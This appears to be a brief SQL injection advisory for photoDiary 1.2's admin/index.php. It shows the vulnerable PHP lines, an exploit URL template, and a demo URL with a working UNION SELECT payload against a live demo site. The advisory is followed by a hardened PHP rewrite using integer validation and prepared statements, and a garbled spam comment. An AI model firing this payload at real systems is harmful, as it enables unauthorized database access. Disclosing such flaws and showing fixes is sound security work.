photoDiary 1.2 - SQL Injection Vuln


[o] photoDiary 1.2 SQL Injection Vulnerability

Software : photoDiary version 1.2
Vendor : http://webgriffe.com/
Download : http://code.google.com/p/photodiary/downloads/list
Author : NoGe


[o] Vulnerable file
admin/index.php
$act = $_GET['act'];
.....
if($act=="edit" || $act=="new"){
$id = $_GET['id'];


[o] Exploit
http://localhost/[path]/admin/index.php?act=edit&id=[SQL]


[o] Demo
http://photodiary.webgriffe.com/demo/admin/index.php?act=edit&id=-56%20union%20select%201,2,version(),4--


[o] Note
It's funny coz usually you do SQL injection to get the admin login, but with this one you must already have admin privs to execute SQL. lolz
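
A hardened form of the act/id handling shown under [o] Vulnerable file, as an added example that is not photoDiary's code or the author's. The advisory does not show the query itself, so the entries table, its columns and the load_entry() helper are assumptions, and an in-memory SQLite database with constructed data stands in for the real one.

```php
<?php
// Added example, not photoDiary's code. The "entries" table, its columns and
// load_entry() are hypothetical; only the act/id parameters come from the advisory.

function load_entry(PDO $db, array $get): ?array
{
    // Allow-list the action instead of trusting $_GET['act'] as-is.
    $act = $get['act'] ?? '';
    if (!in_array($act, ['edit', 'new'], true)) {
        return null;
    }

    // id must be a positive integer; anything else is rejected before any SQL runs.
    $id = filter_var($get['id'] ?? null, FILTER_VALIDATE_INT,
                     ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;
    }

    // Bound parameter: the value is never concatenated into the statement text.
    $stmt = $db->prepare('SELECT id, title FROM entries WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed demo data in an in-memory SQLite database (needs pdo_sqlite).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE entries (id INTEGER PRIMARY KEY, title TEXT)');
$db->exec("INSERT INTO entries (id, title) VALUES (56, 'Sample entry')");

// Constructed requests; the second id is the decoded value from [o] Demo.
$requests = [
    ['act' => 'edit', 'id' => '56'],
    ['act' => 'edit', 'id' => '-56 union select 1,2,version(),4--'],
    ['act' => 'drop', 'id' => '56'],
];
foreach ($requests as $get) {
    $row = load_entry($db, $get);
    echo $get['act'], ' ', $get['id'], ' => ', $row ? $row['title'] : 'rejected', PHP_EOL;
}
```

In the real application, $_GET would be passed in place of the constructed request arrays, and the same integer check and bound parameter apply to every query that uses id.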


Comments

labatterie said…
Tea contains about and one ounce of chocolate contains about caffeine.